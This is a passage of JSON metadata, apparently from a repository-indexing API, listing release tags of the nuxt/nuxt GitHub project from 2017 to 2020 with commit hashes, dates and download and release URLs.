","kind":"tag","published_at":"2020-03-25T19:22:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1/manifests"},{"name":"v2.12.0","sha":"205a089f833f96298d9bd723aea15b93618ec05d","kind":"tag","published_at":"2020-03-17T16:45:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.0/manifests"},{"name":"v2.11.0","sha":"7af9ec8c23d247b22f71866b7b5dcd100f08048d","kind":"tag","published_at":"2019-12-17T10:23:56.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0/manifests"},{"name":"v2.10.2","sha":"f6aa45dda605cae2ea51f7413c97190a7a02cb88","kind":"commit","published_at":"2019-10-21T21:16:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2/manifests"},{"name":"v2.10.1","sha":"624c4c058e47fd36c484efaf1494b762f585f633","kind":"tag","published_at":"2019-10-11T08:11:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1/manifests"},{"name":"v2.10.0","sha":"c17afa77a7c7490863c2040c8f448ba80082a891","kind":"tag","published_at":"2019-10-02T11:44:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0/manifests"},{"name":"v2.9.2","sha":"c8ee9a660809e856c28d8678c6a632bbdd6ed00f","kind":"tag","published_at":"2019-08-28T11:32:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"0157b971de97daecf2fadeafa5596ddaa30cdb28","kind":"tag","published_at":"2019-08-20T11:13:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"ce3b4569613866a69b96f0f89aa2bb7d9810f8c4","kind":"tag","published_at":"2019-08-20T08:24:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0/manifests"},{"name":"v2.8.1","sha":"2fabea9402864828fe9aafe8b0d13bcc674a1b3b","kind":"tag","published_at":"2019-06-04T20:28:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"82ec7b7dedfbc3a01b981a0ef72375814e023291","kind":"tag","published_at":"2019-05-30T17:09:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0/manifests"},{"name":"v2.7.1","sha":"0f609dfb3772ec2682bf67c42762df6041dab034","kind":"tag","published_at":"2019-05-14T18:56:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"5a98230ec617582f7b9393ad27e20fb5a1e6aa04","kind":"tag","published_at":"2019-05-14T12:38:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0/manifests"},{"name":"v2.6.3","sha":"2108cd669c56bb2e566c35ac73d8e693b5ce5c54","kind":"tag","published_at":"2019-04-25T08:43:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"8d14cd4781095dff46a57ae05d60bbaccefb0fbd","kind":"tag","published_at":"2019-04-21T11:22:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"c0776eb2d78f839d2b1249765d2eb117b5f32d2e","kind":"tag","published_at":"2019-04-04T17:58:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"0e51676731e975226a7135003b941b9077256641","kind":"tag","published_at":"2019-04-04T17:06:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"5d7757bf299c724bb52df529c5dbd1a341b19951","kind":"tag","published_at":"2019-03-21T21:48:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"e2c296321b8f70c3e977ed11a0825870a2cc528a","kind":"tag","published_at":"2019-03-21T13:07:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"0ad13e04d2cae232d807ba0dd100b8f3f7bbb010","kind":"commit","published_at":"2019-02-26T10:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5/manifests"},{"name":"v2.4.3","sha":"13e494c0f0013252994eb0de0c4d92bd507b119d","kind":"tag","published_at":"2019-02-06T15:56:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"32b0f155c97a5c7f7cb7cc450274e10a492c9c39","kind":"tag","published_at":"2019-01-30T15:15:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2/manifests"},{"name":"v2.4.0","sha":"5f221b4b7e39e4804bde682b2e71780a7a1e2845","kind":"tag","published_at":"2019-01-28T17:41:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0/manifests"},{"name":"v1.4.5","sha":"c8962964b8ced4c703804ed9cc5e54c6d486a321","kind":"tag","published_at":"2018-11-27T17:37:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5/manifests"},{"name":"v2.3.4","sha":"16c5b892fa3104992f3a6778ac97a0fcb1ca657c","kind":"tag","published_at":"2018-11-26T17:50:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4/manifests"},{"name":"v2.3.2","sha":"205c9d38156c60d93248b9d973a615eee7355f22","kind":"tag","published_at":"2018-11-20T20:49:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"f75a4423354f16603a6b733ca12d873e501f4442","kind":"tag","published_at":"2018-11-16T19:28:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1/manifests"},{"name":"v1.4.4","sha":"8fb8376ff70b9db5feda4492009b0fb7d3e2884a","kind":"tag","published_at":"2018-10-19T14:00:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"f5aff938f7742624708b4eecc7a2b003c1a1d161","kind":"tag","published_at":"2018-10-19T13:45:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3/manifests"},{"name":"v2.3.0","sha":"dbf3ccc4c142083a76fbc4f3281f04e9b3044b79","kind":"commit","published_at":"2018-10-17T21:35:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0/manifests"},{"name":"v2.2.0","sha":"e3b72ded5c56b62ca25f180390a1d60ce8123b5b","kind":"tag","published_at":"2018-10-13T19:07:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0/manifests"},{"name":"v2.1.0","sha":"fdb225fbeb452a421f1484e3a1a16f26952d386e","kind":"tag","published_at":"2018-09-30T16:28:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"7a68e1dde17e0ed7eb7598d9c63ca1ac2383b76e","kind":"commit","published_at":"2018-09-20T21:57:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0/manifests"},{"name":"v1.4.2","sha":"376dd35ba9465e1163a800bd0512654f68436b5f","kind":"tag","published_at":"2018-08-01T19:59:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2/manifests"},{"name":"v1.4.1","sha":"5b7e27a1af4aa0d212766513693949f9d7917bd5","kind":"tag","published_at":"2018-06-06T13:01:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1/manifests"},{"name":"v1.4.0","sha":"85b584693cd1e689406ad722b47735fa7d0faf26","kind":"tag","published_at":"2018-03-01T16:45:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0/manifests"},{"name":"v1.3.0","sha":"1582df149d7f18402faa58c47e080e3f0cc52a16","kind":"tag","published_at":"2018-01-31T16:13:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0/manifests"},{"name":"v1.2.1","sha":"f0bd9a573b3756a6f878b3964222679a8c58beaa","kind":"tag","published_at":"2018-01-26T12:24:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1/manifests"},{"name":"v1.2.0","sha":"78494dac927681007ea6725b4548db8fd838ed16","kind":"tag","published_at":"2018-01-26T11:54:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0/manifests"},{"name":"v1.1.1","sha":"6dce671498d0128662579cfb08dd7e3e67253261","kind":"tag","published_at":"2018-01-13T13:10:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0/manifests"},{"name":"v1.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1/manifests"},{"name":"v1.0.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"b83d74588fa45018dd89bb6ab4b4305be7f6a50a","kind":"tag","published_at":"2018-01-08T16:07:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc11","sha":"034df15231fa7986cf626ccc48305a0ba0a6cba2","kind":"commit","published_at":"2017-09-07T12:53:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"e24b4a7cc59e1b56b2a748682aa9180cd881097f","kind":"commit","published_at":"2017-09-07T12:31:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"226a8701b4f18cf213adb8f474c052adf2376ded","kind":"commit","published_at":"2017-09-06T13:34:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"63bc512d73660986546bd2428649d0299a6a0abd","kind":"commit","published_at":"2017-08-30T16:36:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"138edc7bfdbc9617a3f4e245f9bd32d0fcfc3a2b","kind":"commit","published_at":"2017-08-29T12:04:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"b931dd40cea828021f3092d1e224053a1baacba0","kind":"commit","published_at":"2017-08-21T20:08:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"e34d9d69bb44301976e1ee78fcd454b904f7701a","kind":"commit","published_at":"2017-08-21T08:38:06.000Z","download_url":"